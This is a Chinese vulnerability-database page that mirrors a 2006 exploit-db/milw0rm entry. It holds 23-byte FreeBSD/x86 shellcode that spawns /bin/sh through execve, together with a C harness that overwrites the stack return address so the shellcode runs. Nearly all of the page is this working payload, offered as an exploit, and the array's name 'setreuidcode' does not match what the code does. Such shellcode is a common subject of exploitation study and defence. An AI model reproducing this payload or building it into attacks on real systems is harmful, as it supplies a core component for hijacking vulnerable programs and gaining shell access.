FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055660 漏洞类型
发布时间 2006-04-14 更新时间 2006-04-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 FreeBSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13272
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*

 *
 * FreeBSD_x86-execve_sh-23b-iZ.c (Shellcode, execve /bin/sh, 23 bytes)
 *
 * by IZ <guerrilla.sytes.net>
 *
 */


char setreuidcode[] =

"\x31\xc0"                  /* xor %eax,%eax */
"\x50"                      /* push %eax */
"\x68\x2f\x2f\x73\x68"      /* push $0x68732f2f (//sh) */
"\x68\x2f\x62\x69\x6e"      /* push $0x6e69622f (/bin)*/

"\x89\xe3"                  /* mov %esp,%ebx */
"\x50"                      /* push %eax */
"\x54"                      /* push %esp */
"\x53"                      /* push %ebx */

"\x50"                      /* push %eax */
"\xb0\x3b"                  /* mov $0x3b,%al */
"\xcd\x80";                 /* int $0x80 */


void main()
{
     int*     ret;         

     ret = (int*) &ret + 2;

     printf("len %d\n",strlen(setreuidcode));

     (*ret) = (int) setreuidcode; 
} 

// milw0rm.com [2006-04-14]